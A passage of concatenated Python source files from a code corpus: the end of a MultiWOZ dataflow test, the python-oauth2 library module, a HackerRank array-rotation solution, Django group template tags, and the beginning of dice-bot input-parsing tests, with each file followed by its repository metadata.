"""(find (Constraint[Restaurant] :area (refer (Constraint[Area])) :book-day (?= "none") :book-people (?= "none") :book-time (?= "none") :food (?= "none") :name (?= "none") :pricerange (?= "none")))""",
# turn 7
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 8
"()",
# turn 9
"""(find (Constraint[Taxi] :arriveby (?= "none") :departure (?= "none") :destination (?= "none") :leaveat (?= "none")))""",
# turn 10
"()",
]
dataflow_dialogue, _, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue_1,
keep_all_domains=True,
remove_none=False,
fill_none=True,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=False,
utterance_tokenizer=utterance_tokenizer,
)
for turn, expected_plan in zip(
dataflow_dialogue.turns, expected_plans # pylint: disable=no-member
):
lispress = turn.lispress
assert lispress == expected_plan
def test_create_programs_with_revise_with_avoid_empty_plan(
trade_dialogue_1: Dict[str, Any]
):
utterance_tokenizer = UtteranceTokenizer()
salience_model = VanillaSalienceModel()
expected_plans: List[str] = [
# turn 1
"""(find (Constraint[Hotel] :name (?= "none") :type (?= "none")))""",
# turn 2
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "hilton") :pricerange (?= "cheap") :type (?= "guest house")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 3
"""(ReviseConstraint :new (Constraint[Hotel] :name (?= "none")) :oldLocation (Constraint[Constraint[Hotel]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 4
"""(abandon (Constraint[Hotel]))""",
# turn 5
"""(find (Constraint[Hotel] :area (?= "west")))""",
# turn 6
"""(find (Constraint[Restaurant] :area (refer (Constraint[Area]))))""",
# turn 7
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 8
"""(ReviseConstraint :new (Constraint[Restaurant] :pricerange (refer (Constraint[Pricerange]))) :oldLocation (Constraint[Constraint[Restaurant]]) :rootLocation (roleConstraint #(Path "output")))""",
# turn 9
"""(find (Constraint[Taxi] :departure (?= "none")))""",
# turn 10
"""(ReviseConstraint :new (Constraint[Taxi] :departure (?= "none")) :oldLocation (Constraint[Constraint[Taxi]]) :rootLocation (roleConstraint #(Path "output")))""",
]
dataflow_dialogue, _, _ = create_programs_for_trade_dialogue(
trade_dialogue=trade_dialogue_1,
keep_all_domains=True,
remove_none=False,
fill_none=False,
salience_model=salience_model,
no_revise=False,
avoid_empty_plan=True,
utterance_tokenizer=utterance_tokenizer,
)
for turn_part, expected_plan in zip(dataflow_dialogue.turns, expected_plans):
lispress = turn_part.lispress
assert lispress == expected_plan
| microsoft/task_oriented_dialogue_as_dataflow_synthesis | tests/test_dataflow/multiwoz/test_create_programs.py | Python | mit | 10,600 |
"""
The MIT License
Copyright (c) 2007-2010 Leah Culver, Joe Stump, Mark Paschal, Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import base64
import urllib
import time
import random
import urlparse
import hmac
import binascii
import httplib2
try:
from urlparse import parse_qs
parse_qs # placate pyflakes
except ImportError:
# fall back for Python 2.5
from cgi import parse_qs
try:
from hashlib import sha1
sha = sha1
except ImportError:
# hashlib was added in Python 2.5
import sha
import _version
__version__ = _version.__version__
OAUTH_VERSION = '1.0' # Hi Blaine!
HTTP_METHOD = 'GET'
SIGNATURE_METHOD = 'PLAINTEXT'
class Error(RuntimeError):
"""Generic exception class."""
def __init__(self, message='OAuth error occurred.'):
self._message = message
@property
def message(self):
"""A hack to get around the deprecation errors in 2.6."""
return self._message
def __str__(self):
return self._message
class MissingSignature(Error):
pass
def build_authenticate_header(realm=''):
"""Optional WWW-Authenticate header (401 error)"""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def build_xoauth_string(url, consumer, token=None):
"""Build an XOAUTH string for use in SMTP/IMPA authentication."""
request = Request.from_consumer_and_token(consumer, token,
"GET", url)
signing_method = SignatureMethod_HMAC_SHA1()
request.sign_request(signing_method, consumer, token)
params = []
for k, v in sorted(request.iteritems()):
if v is not None:
params.append('%s="%s"' % (k, escape(v)))
return "%s %s %s" % ("GET", url, ','.join(params))
def to_unicode(s):
""" Convert to unicode, raise exception with instructive error
message if s is not unicode, ascii, or utf-8. """
if not isinstance(s, unicode):
if not isinstance(s, str):
raise TypeError('You are required to pass either unicode or string here, not: %r (%s)' % (type(s), s))
try:
s = s.decode('utf-8')
except UnicodeDecodeError, le:
raise TypeError('You are required to pass either a unicode object or a utf-8 string here. You passed a Python string object which contained non-utf-8: %r. The UnicodeDecodeError that resulted from attempting to interpret it as utf-8 was: %s' % (s, le,))
return s
def to_utf8(s):
return to_unicode(s).encode('utf-8')
def to_unicode_if_string(s):
if isinstance(s, basestring):
return to_unicode(s)
else:
return s
def to_utf8_if_string(s):
if isinstance(s, basestring):
return to_utf8(s)
else:
return s
def to_unicode_optional_iterator(x):
"""
Raise TypeError if x is a str containing non-utf8 bytes or if x is
an iterable which contains such a str.
"""
if isinstance(x, basestring):
return to_unicode(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_unicode(e) for e in l ]
def to_utf8_optional_iterator(x):
"""
    Convert x to a utf-8 encoded str if it is a string, or convert each string
    element if x is an iterable; non-string elements are passed through. Raise
    TypeError if a str contains non-utf8 bytes.
"""
if isinstance(x, basestring):
return to_utf8(x)
try:
l = list(x)
except TypeError, e:
assert 'is not iterable' in str(e)
return x
else:
return [ to_utf8_if_string(e) for e in l ]
def escape(s):
"""Escape a URL including any /."""
return urllib.quote(s.encode('utf-8'), safe='~')
def generate_timestamp():
"""Get seconds since epoch (UTC)."""
return int(time.time())
def generate_nonce(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
def generate_verifier(length=8):
"""Generate pseudorandom number."""
return ''.join([str(random.randint(0, 9)) for i in range(length)])
class Consumer(object):
"""A consumer of OAuth-protected services.
The OAuth consumer is a "third-party" service that wants to access
protected resources from an OAuth service provider on behalf of an end
    user. In OAuth terms, the consumer plays the role of the client.
Usually a consumer must be registered with the service provider by the
developer of the consumer software. As part of that process, the service
provider gives the consumer a *key* and a *secret* with which the consumer
software can identify itself to the service. The consumer will include its
key in each request to identify itself, but will use its secret only when
signing requests, to prove that the request is from that particular
registered consumer.
Once registered, the consumer can then use its consumer credentials to ask
the service provider for a request token, kicking off the OAuth
authorization process.
"""
key = None
secret = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def __str__(self):
data = {'oauth_consumer_key': self.key,
'oauth_consumer_secret': self.secret}
return urllib.urlencode(data)
class Token(object):
"""An OAuth credential used to request authorization or a protected
resource.
Tokens in OAuth comprise a *key* and a *secret*. The key is included in
requests to identify the token being used, but the secret is used only in
the signature, to prove that the requester is who the server gave the
token to.
When first negotiating the authorization, the consumer asks for a *request
token* that the live user authorizes with the service provider. The
consumer then exchanges the request token for an *access token* that can
be used to access protected resources.
"""
key = None
secret = None
callback = None
callback_confirmed = None
verifier = None
def __init__(self, key, secret):
self.key = key
self.secret = secret
if self.key is None or self.secret is None:
raise ValueError("Key and secret must be set.")
def set_callback(self, callback):
self.callback = callback
self.callback_confirmed = 'true'
def set_verifier(self, verifier=None):
if verifier is not None:
self.verifier = verifier
else:
self.verifier = generate_verifier()
def get_callback_url(self):
if self.callback and self.verifier:
# Append the oauth_verifier.
parts = urlparse.urlparse(self.callback)
scheme, netloc, path, params, query, fragment = parts[:6]
if query:
query = '%s&oauth_verifier=%s' % (query, self.verifier)
else:
query = 'oauth_verifier=%s' % self.verifier
return urlparse.urlunparse((scheme, netloc, path, params,
query, fragment))
return self.callback
def to_string(self):
"""Returns this token as a plain string, suitable for storage.
The resulting string includes the token's secret, so you should never
send or store this string where a third party can read it.
"""
data = {
'oauth_token': self.key,
'oauth_token_secret': self.secret,
}
if self.callback_confirmed is not None:
data['oauth_callback_confirmed'] = self.callback_confirmed
return urllib.urlencode(data)
@staticmethod
def from_string(s):
"""Deserializes a token from a string like one returned by
`to_string()`."""
if not len(s):
raise ValueError("Invalid parameter string.")
params = parse_qs(s, keep_blank_values=False)
if not len(params):
raise ValueError("Invalid parameter string.")
try:
key = params['oauth_token'][0]
except Exception:
raise ValueError("'oauth_token' not found in OAuth request.")
try:
secret = params['oauth_token_secret'][0]
except Exception:
raise ValueError("'oauth_token_secret' not found in "
"OAuth request.")
token = Token(key, secret)
try:
token.callback_confirmed = params['oauth_callback_confirmed'][0]
except KeyError:
pass # 1.0, no callback confirmed.
return token
def __str__(self):
return self.to_string()
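# Hedged illustration (added for clarity, not part of the original library):
# round-tripping a token through its string form; the key/secret values below
# are made up.
#
#   tok = Token('request-key', 'request-secret')
#   tok.set_callback('http://example.com/cb')
#   s = tok.to_string()                 # urlencoded, includes the secret
#   same = Token.from_string(s)
#   assert same.key == 'request-key'
#   assert same.callback_confirmed == 'true'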
def setter(attr):
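    # Decorator helper: given a setter function, build a property whose getter
    # and deleter read/remove the value from the instance __dict__ under the
    # setter's name, while the decorated function itself acts as the setter.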
name = attr.__name__
def getter(self):
try:
return self.__dict__[name]
except KeyError:
raise AttributeError(name)
def deleter(self):
del self.__dict__[name]
return property(getter, attr, deleter)
class Request(dict):
"""The parameters and information for an HTTP request, suitable for
authorizing with OAuth credentials.
When a consumer wants to access a service's protected resources, it does
so using a signed HTTP request identifying itself (the consumer) with its
key, and providing an access token authorized by the end user to access
those resources.
"""
version = OAUTH_VERSION
def __init__(self, method=HTTP_METHOD, url=None, parameters=None,
body='', is_form_encoded=False):
if url is not None:
self.url = to_unicode(url)
self.method = method
if parameters is not None:
for k, v in parameters.iteritems():
k = to_unicode(k)
v = to_unicode_optional_iterator(v)
self[k] = v
self.body = body
self.is_form_encoded = is_form_encoded
@setter
def url(self, value):
self.__dict__['url'] = value
if value is not None:
scheme, netloc, path, params, query, fragment = urlparse.urlparse(value)
# Exclude default port numbers.
if scheme == 'http' and netloc[-3:] == ':80':
netloc = netloc[:-3]
elif scheme == 'https' and netloc[-4:] == ':443':
netloc = netloc[:-4]
if scheme not in ('http', 'https'):
raise ValueError("Unsupported URL %s (%s)." % (value, scheme))
# Normalized URL excludes params, query, and fragment.
self.normalized_url = urlparse.urlunparse((scheme, netloc, path, None, None, None))
else:
self.normalized_url = None
self.__dict__['url'] = None
@setter
def method(self, value):
self.__dict__['method'] = value.upper()
def _get_timestamp_nonce(self):
return self['oauth_timestamp'], self['oauth_nonce']
def get_nonoauth_parameters(self):
"""Get any non-OAuth parameters."""
return dict([(k, v) for k, v in self.iteritems()
if not k.startswith('oauth_')])
def to_header(self, realm=''):
"""Serialize as a header for an HTTPAuth request."""
oauth_params = ((k, v) for k, v in self.items()
if k.startswith('oauth_'))
stringy_params = ((k, escape(str(v))) for k, v in oauth_params)
header_params = ('%s="%s"' % (k, v) for k, v in stringy_params)
params_header = ', '.join(header_params)
auth_header = 'OAuth realm="%s"' % realm
if params_header:
auth_header = "%s, %s" % (auth_header, params_header)
return {'Authorization': auth_header}
def to_postdata(self):
"""Serialize as post data for a POST request."""
d = {}
for k, v in self.iteritems():
d[k.encode('utf-8')] = to_utf8_optional_iterator(v)
# tell urlencode to deal with sequence values and map them correctly
# to resulting querystring. for example self["k"] = ["v1", "v2"] will
# result in 'k=v1&k=v2' and not k=%5B%27v1%27%2C+%27v2%27%5D
return urllib.urlencode(d, True).replace('+', '%20')
def to_url(self):
"""Serialize as a URL for a GET request."""
base_url = urlparse.urlparse(self.url)
try:
query = base_url.query
except AttributeError:
# must be python <2.5
query = base_url[4]
query = parse_qs(query)
for k, v in self.items():
query.setdefault(k, []).append(v)
try:
scheme = base_url.scheme
netloc = base_url.netloc
path = base_url.path
params = base_url.params
fragment = base_url.fragment
except AttributeError:
# must be python <2.5
scheme = base_url[0]
netloc = base_url[1]
path = base_url[2]
params = base_url[3]
fragment = base_url[5]
url = (scheme, netloc, path, params,
urllib.urlencode(query, True), fragment)
return urlparse.urlunparse(url)
def get_parameter(self, parameter):
ret = self.get(parameter)
if ret is None:
raise Error('Parameter not found: %s' % parameter)
return ret
def get_normalized_parameters(self):
"""Return a string that contains the parameters that must be signed."""
items = []
for key, value in self.iteritems():
if key == 'oauth_signature':
continue
# 1.0a/9.1.1 states that kvp must be sorted by key, then by value,
# so we unpack sequence values into multiple items for sorting.
if isinstance(value, basestring):
items.append((to_utf8_if_string(key), to_utf8(value)))
else:
try:
value = list(value)
except TypeError, e:
assert 'is not iterable' in str(e)
items.append((to_utf8_if_string(key), to_utf8_if_string(value)))
else:
items.extend((to_utf8_if_string(key), to_utf8_if_string(item)) for item in value)
# Include any query string parameters from the provided URL
query = urlparse.urlparse(self.url)[4]
url_items = self._split_url_string(query).items()
url_items = [(to_utf8(k), to_utf8(v)) for k, v in url_items if k != 'oauth_signature' ]
items.extend(url_items)
items.sort()
encoded_str = urllib.urlencode(items)
        # Encode signature parameters per OAuth Core 1.0 protocol
# spec draft 7, section 3.6
# (http://tools.ietf.org/html/draft-hammer-oauth-07#section-3.6)
# Spaces must be encoded with "%20" instead of "+"
return encoded_str.replace('+', '%20').replace('%7E', '~')
def sign_request(self, signature_method, consumer, token):
"""Set the signature parameter to the result of sign."""
if not self.is_form_encoded:
# according to
# http://oauth.googlecode.com/svn/spec/ext/body_hash/1.0/oauth-bodyhash.html
# section 4.1.1 "OAuth Consumers MUST NOT include an
# oauth_body_hash parameter on requests with form-encoded
# request bodies."
self['oauth_body_hash'] = base64.b64encode(sha(self.body).digest())
if 'oauth_consumer_key' not in self:
self['oauth_consumer_key'] = consumer.key
if token and 'oauth_token' not in self:
self['oauth_token'] = token.key
self['oauth_signature_method'] = signature_method.name
self['oauth_signature'] = signature_method.sign(self, consumer, token)
@classmethod
def make_timestamp(cls):
"""Get seconds since epoch (UTC)."""
return str(int(time.time()))
@classmethod
def make_nonce(cls):
"""Generate pseudorandom number."""
return str(random.randint(0, 100000000))
@classmethod
def from_request(cls, http_method, http_url, headers=None, parameters=None,
query_string=None):
"""Combines multiple parameter sources."""
if parameters is None:
parameters = {}
# Headers
if headers and 'Authorization' in headers:
auth_header = headers['Authorization']
# Check that the authorization header is OAuth.
if auth_header[:6] == 'OAuth ':
auth_header = auth_header[6:]
try:
# Get the parameters from the header.
header_params = cls._split_header(auth_header)
parameters.update(header_params)
except:
raise Error('Unable to parse OAuth parameters from '
'Authorization header.')
# GET or POST query string.
if query_string:
query_params = cls._split_url_string(query_string)
parameters.update(query_params)
# URL parameters.
param_str = urlparse.urlparse(http_url)[4] # query
url_params = cls._split_url_string(param_str)
parameters.update(url_params)
if parameters:
return cls(http_method, http_url, parameters)
return None
@classmethod
def from_consumer_and_token(cls, consumer, token=None,
http_method=HTTP_METHOD, http_url=None, parameters=None,
body='', is_form_encoded=False):
if not parameters:
parameters = {}
defaults = {
'oauth_consumer_key': consumer.key,
'oauth_timestamp': cls.make_timestamp(),
'oauth_nonce': cls.make_nonce(),
'oauth_version': cls.version,
}
defaults.update(parameters)
parameters = defaults
if token:
parameters['oauth_token'] = token.key
if token.verifier:
parameters['oauth_verifier'] = token.verifier
return Request(http_method, http_url, parameters, body=body,
is_form_encoded=is_form_encoded)
@classmethod
def from_token_and_callback(cls, token, callback=None,
http_method=HTTP_METHOD, http_url=None, parameters=None):
if not parameters:
parameters = {}
parameters['oauth_token'] = token.key
if callback:
parameters['oauth_callback'] = callback
return cls(http_method, http_url, parameters)
@staticmethod
def _split_header(header):
"""Turn Authorization: header into parameters."""
params = {}
parts = header.split(',')
for param in parts:
# Ignore realm parameter.
if param.find('realm') > -1:
continue
# Remove whitespace.
param = param.strip()
# Split key-value.
param_parts = param.split('=', 1)
# Remove quotes and unescape the value.
params[param_parts[0]] = urllib.unquote(param_parts[1].strip('\"'))
return params
@staticmethod
def _split_url_string(param_str):
"""Turn URL string into parameters."""
parameters = parse_qs(param_str.encode('utf-8'), keep_blank_values=True)
for k, v in parameters.iteritems():
parameters[k] = urllib.unquote(v[0])
return parameters
class Client(httplib2.Http):
"""OAuthClient is a worker to attempt to execute a request."""
def __init__(self, consumer, token=None, cache=None, timeout=None,
proxy_info=None):
if consumer is not None and not isinstance(consumer, Consumer):
raise ValueError("Invalid consumer.")
if token is not None and not isinstance(token, Token):
raise ValueError("Invalid token.")
self.consumer = consumer
self.token = token
self.method = SignatureMethod_HMAC_SHA1()
httplib2.Http.__init__(self, cache=cache, timeout=timeout, proxy_info=proxy_info)
def set_signature_method(self, method):
if not isinstance(method, SignatureMethod):
raise ValueError("Invalid signature method.")
self.method = method
def request(self, uri, method="GET", body='', headers=None,
redirections=httplib2.DEFAULT_MAX_REDIRECTS, connection_type=None):
DEFAULT_POST_CONTENT_TYPE = 'application/x-www-form-urlencoded'
if not isinstance(headers, dict):
headers = {}
if method == "POST":
headers['Content-Type'] = headers.get('Content-Type',
DEFAULT_POST_CONTENT_TYPE)
is_form_encoded = \
headers.get('Content-Type') == 'application/x-www-form-urlencoded'
if is_form_encoded and body:
parameters = dict([(k,v[0]) for k,v in parse_qs(body).items()])
else:
parameters = None
req = Request.from_consumer_and_token(self.consumer,
token=self.token, http_method=method, http_url=uri,
parameters=parameters, body=body, is_form_encoded=is_form_encoded)
req.sign_request(self.method, self.consumer, self.token)
schema, rest = urllib.splittype(uri)
if rest.startswith('//'):
hierpart = '//'
else:
hierpart = ''
host, rest = urllib.splithost(rest)
realm = schema + ':' + hierpart + host
if method == "POST" and is_form_encoded:
body = req.to_postdata()
elif method == "GET":
uri = req.to_url()
else:
headers.update(req.to_header(realm=realm))
return httplib2.Http.request(self, uri, method=method, body=body,
headers=headers, redirections=redirections,
connection_type=connection_type)
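# Hedged usage sketch (illustrative, not part of the original module): issuing a
# signed request against a protected resource. The URL and credentials are
# placeholders and the call needs network access, so it is left commented out.
#
#   consumer = Consumer('consumer-key', 'consumer-secret')
#   token = Token('access-key', 'access-secret')
#   client = Client(consumer, token)
#   resp, content = client.request('https://api.example.com/resource', 'GET')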
class Server(object):
"""A skeletal implementation of a service provider, providing protected
resources to requests from authorized consumers.
This class implements the logic to check requests for authorization. You
can use it with your web server or web framework to protect certain
resources with OAuth.
"""
timestamp_threshold = 300 # In seconds, five minutes.
version = OAUTH_VERSION
signature_methods = None
def __init__(self, signature_methods=None):
self.signature_methods = signature_methods or {}
def add_signature_method(self, signature_method):
self.signature_methods[signature_method.name] = signature_method
return self.signature_methods
def verify_request(self, request, consumer, token):
"""Verifies an api call and checks all the parameters."""
self._check_version(request)
self._check_signature(request, consumer, token)
parameters = request.get_nonoauth_parameters()
return parameters
def build_authenticate_header(self, realm=''):
"""Optional support for the authenticate header."""
return {'WWW-Authenticate': 'OAuth realm="%s"' % realm}
def _check_version(self, request):
"""Verify the correct version of the request for this server."""
version = self._get_version(request)
if version and version != self.version:
raise Error('OAuth version %s not supported.' % str(version))
def _get_version(self, request):
"""Return the version of the request for this server."""
try:
version = request.get_parameter('oauth_version')
except:
version = OAUTH_VERSION
return version
def _get_signature_method(self, request):
"""Figure out the signature with some defaults."""
try:
signature_method = request.get_parameter('oauth_signature_method')
except:
signature_method = SIGNATURE_METHOD
try:
# Get the signature method object.
signature_method = self.signature_methods[signature_method]
except:
signature_method_names = ', '.join(self.signature_methods.keys())
            raise Error('Signature method %s not supported, try one of the following: %s' % (signature_method, signature_method_names))
return signature_method
def _get_verifier(self, request):
return request.get_parameter('oauth_verifier')
def _check_signature(self, request, consumer, token):
timestamp, nonce = request._get_timestamp_nonce()
self._check_timestamp(timestamp)
signature_method = self._get_signature_method(request)
try:
signature = request.get_parameter('oauth_signature')
except:
raise MissingSignature('Missing oauth_signature.')
# Validate the signature.
valid = signature_method.check(request, consumer, token, signature)
if not valid:
key, base = signature_method.signing_base(request, consumer, token)
raise Error('Invalid signature. Expected signature base '
'string: %s' % base)
def _check_timestamp(self, timestamp):
"""Verify that timestamp is recentish."""
timestamp = int(timestamp)
now = int(time.time())
lapsed = now - timestamp
if lapsed > self.timestamp_threshold:
raise Error('Expired timestamp: given %d and now %s has a '
'greater difference than threshold %d' % (timestamp, now,
self.timestamp_threshold))
class SignatureMethod(object):
"""A way of signing requests.
The OAuth protocol lets consumers and service providers pick a way to sign
requests. This interface shows the methods expected by the other `oauth`
modules for signing requests. Subclass it and implement its methods to
provide a new way to sign requests.
"""
def signing_base(self, request, consumer, token):
"""Calculates the string that needs to be signed.
This method returns a 2-tuple containing the starting key for the
signing and the message to be signed. The latter may be used in error
messages to help clients debug their software.
"""
raise NotImplementedError
def sign(self, request, consumer, token):
"""Returns the signature for the given request, based on the consumer
and token also provided.
You should use your implementation of `signing_base()` to build the
message to sign. Otherwise it may be less useful for debugging.
"""
raise NotImplementedError
def check(self, request, consumer, token, signature):
"""Returns whether the given signature is the correct signature for
the given consumer and token signing the given request."""
built = self.sign(request, consumer, token)
return built == signature
class SignatureMethod_HMAC_SHA1(SignatureMethod):
name = 'HMAC-SHA1'
def signing_base(self, request, consumer, token):
if not hasattr(request, 'normalized_url') or request.normalized_url is None:
raise ValueError("Base URL for request is not set.")
sig = (
escape(request.method),
escape(request.normalized_url),
escape(request.get_normalized_parameters()),
)
key = '%s&' % escape(consumer.secret)
if token:
key += escape(token.secret)
raw = '&'.join(sig)
return key, raw
def sign(self, request, consumer, token):
"""Builds the base signature string."""
key, raw = self.signing_base(request, consumer, token)
hashed = hmac.new(key, raw, sha)
# Calculate the digest base 64.
return binascii.b2a_base64(hashed.digest())[:-1]
class SignatureMethod_PLAINTEXT(SignatureMethod):
name = 'PLAINTEXT'
def signing_base(self, request, consumer, token):
"""Concatenates the consumer key and secret with the token's
secret."""
sig = '%s&' % escape(consumer.secret)
if token:
sig = sig + escape(token.secret)
return sig, sig
def sign(self, request, consumer, token):
key, raw = self.signing_base(request, consumer, token)
return raw
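# Hedged end-to-end signing sketch (illustrative, not part of the original
# library). It only exercises local signing - no network access - and every
# key, secret and URL below is made up.
#
#   consumer = Consumer('consumer-key', 'consumer-secret')
#   token = Token('access-key', 'access-secret')
#   req = Request.from_consumer_and_token(consumer, token=token,
#                                         http_method='GET',
#                                         http_url='http://example.com/photos')
#   req.sign_request(SignatureMethod_HMAC_SHA1(), consumer, token)
#   print req.to_header()   # {'Authorization': 'OAuth realm="", oauth_...'}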
| jasonrubenstein/python_oauth2 | oauth2/__init__.py | Python | mit | 29,031 |
# We slice the array into two parts at index d, then print the second part
# followed by the first, which is a left rotation by d positions.
n, d = map(int, input().split())
A = list(map(int, input().split()))
print(*(A[d:] + A[:d]))
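# Worked example (illustrative): n=5, d=4, A=[1, 2, 3, 4, 5]
# A[4:] + A[:4] == [5, 1, 2, 3, 4], printed as "5 1 2 3 4".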
| yznpku/HackerRank | solution/practice/data-structures/arrays/array-left-rotation/solution.py | Python | mit | 177 |
from django import template
from django.utils.encoding import smart_str
from django.core.urlresolvers import reverse, NoReverseMatch
from django.db.models import get_model
from django.db.models.query import QuerySet
register = template.Library()
class GroupURLNode(template.Node):
def __init__(self, view_name, group, kwargs, asvar):
self.view_name = view_name
self.group = group
self.kwargs = kwargs
self.asvar = asvar
def render(self, context):
url = ""
group = self.group.resolve(context)
kwargs = {}
for k, v in self.kwargs.items():
kwargs[smart_str(k, "ascii")] = v.resolve(context)
if group:
bridge = group.content_bridge
try:
url = bridge.reverse(self.view_name, group, kwargs=kwargs)
except NoReverseMatch:
if self.asvar is None:
raise
else:
try:
url = reverse(self.view_name, kwargs=kwargs)
except NoReverseMatch:
if self.asvar is None:
raise
if self.asvar:
context[self.asvar] = url
return ""
else:
return url
class ContentObjectsNode(template.Node):
def __init__(self, group_var, model_name_var, context_var):
self.group_var = template.Variable(group_var)
self.model_name_var = template.Variable(model_name_var)
self.context_var = context_var
def render(self, context):
group = self.group_var.resolve(context)
model_name = self.model_name_var.resolve(context)
if isinstance(model_name, QuerySet):
model = model_name
else:
app_name, model_name = model_name.split(".")
model = get_model(app_name, model_name)
context[self.context_var] = group.content_objects(model)
return ""
@register.tag
def groupurl(parser, token):
bits = token.contents.split()
tag_name = bits[0]
if len(bits) < 3:
raise template.TemplateSyntaxError("'%s' takes at least two arguments"
" (path to a view and a group)" % tag_name)
view_name = bits[1]
group = parser.compile_filter(bits[2])
args = []
kwargs = {}
asvar = None
if len(bits) > 3:
bits = iter(bits[3:])
for bit in bits:
if bit == "as":
asvar = bits.next()
break
else:
for arg in bit.split(","):
if "=" in arg:
k, v = arg.split("=", 1)
k = k.strip()
kwargs[k] = parser.compile_filter(v)
elif arg:
raise template.TemplateSyntaxError("'%s' does not support non-kwargs arguments." % tag_name)
return GroupURLNode(view_name, group, kwargs, asvar)
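# Hedged template usage sketch (illustrative; the view name, group variable and
# keyword argument are assumptions, not taken from this file):
#
#   {% groupurl task_detail group id=task.pk as task_url %}
#   <a href="{{ task_url }}">{{ task }}</a>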
@register.tag
def content_objects(parser, token):
"""
{% content_objects group "tasks.Task" as tasks %}
"""
bits = token.split_contents()
if len(bits) != 5:
raise template.TemplateSyntaxError("'%s' requires five arguments." % bits[0])
return ContentObjectsNode(bits[1], bits[2], bits[4])
| ericholscher/pinax | pinax/apps/groups/templatetags/group_tags.py | Python | mit | 3,311 |
import unittest
import unittest.mock as mock
import dice
import dice_config as dcfg
import dice_exceptions as dexc
class DiceInputVerificationTest(unittest.TestCase):
def test_dice_roll_input_wod(self):
examples = {'!r 5':[5, 10, None, 10, 8, 'wod', None],
'!r 2000':[2000, 10, None, 10, 8, 'wod', None],
'!r 2d8':[2, 8, None, None, None, 'wod', None],
'!r 7d6x4':[7, 6, None, 4, None, 'wod', None],
'!r 5000d700x700':[5000, 700, None, 700, None, 'wod', None],
'!r 15d20?20':[15, 20, None, None, 20, 'wod', None],
'!r 39d10x5?8':[39, 10, None, 5, 8, 'wod', None],
'!r 1d4x4?4':[1, 4, None, 4, 4, 'wod', None],
'!r 6d6+':[6, 6, 0, None, None, 'wod', None],
'!r 5d32+5':[5, 32, 5, None, None, 'wod', None],
'!r 17d4-12':[17, 4, -12, None, None, 'wod', None],
'!r 3d12+x12':[3, 12, 0, 12, None, 'wod', None],
'!r 10d20-7?15':[10, 20, -7, None, 15, 'wod', None],
'!r 768d37+33x5?23':[768, 37, 33, 5, 23, 'wod', None]}
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example)
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_roll_input_simple(self):
examples = {'!r 7':[7, 6, 0, None, None, 'simple', None],
'!r 2000':[2000, 6, 0, None, None, 'simple', None],
'!r 2d8':[2, 8, None, None, None, 'simple', None],
'!r 7d6x4':[7, 6, None, 4, None, 'simple', None],
'!r 8000d899x899':[8000, 899, None, 899, None, 'simple', None],
'!r 15d20?20':[15, 20, None, None, 20, 'simple', None],
'!r 39d10x5?8':[39, 10, None, 5, 8, 'simple', None],
'!r 1d4x4?4':[1, 4, None, 4, 4, 'simple', None],
'!r 6d6+':[6, 6, 0, None, None, 'simple', None],
'!r 5d32+5':[5, 32, 5, None, None, 'simple', None],
'!r 17d4-12':[17, 4, -12, None, None, 'simple', None],
'!r 3d12+x12':[3, 12, 0, 12, None, 'simple', None],
'!r 10d20-7?15':[10, 20, -7, None, 15, 'simple', None],
'!r 768d37+33x5?23':[768, 37, 33, 5, 23, 'simple', None]}
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example, 'simple')
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_options_help(self):
examples = {'!r help': [None, None, None, None, None, dcfg.mode, 'Find all available commands at:'
'\nhttps://github.com/brmedeiros/dicey9000/blob/master/README.md']}
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example, dcfg.mode)
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_options_mode(self):
examples = {'!r set wod': [None, None, None, None, None,
'wod', 'Default mode (!r n) set to World of Darksness (WoD)'],
'!r set simple': [None, None, None, None, None,
'simple', 'Default mode (!r n) set to simple (nd6)']}
for dmode in ['wod', 'simple']:
for example, value in examples.items():
n, d, m, x, s, mode, cmd_msg = dice.dice_input_verification(example, dmode)
self.assertEqual([n, d, m, x, s, mode, cmd_msg], value)
def test_dice_input_exception(self):
examples = ['!r ', '!r dmeoamdef', '!r kelf laij', '!r 2 3', '!r 6dz','!r 30dx', '!r 5d7x7?', '!r 9d10?',
'!r -10', '!r -6d8', '!r 6d8x?10', '!r 12d12x18?', '!r set ', '!r set help', '!r set akneoi',
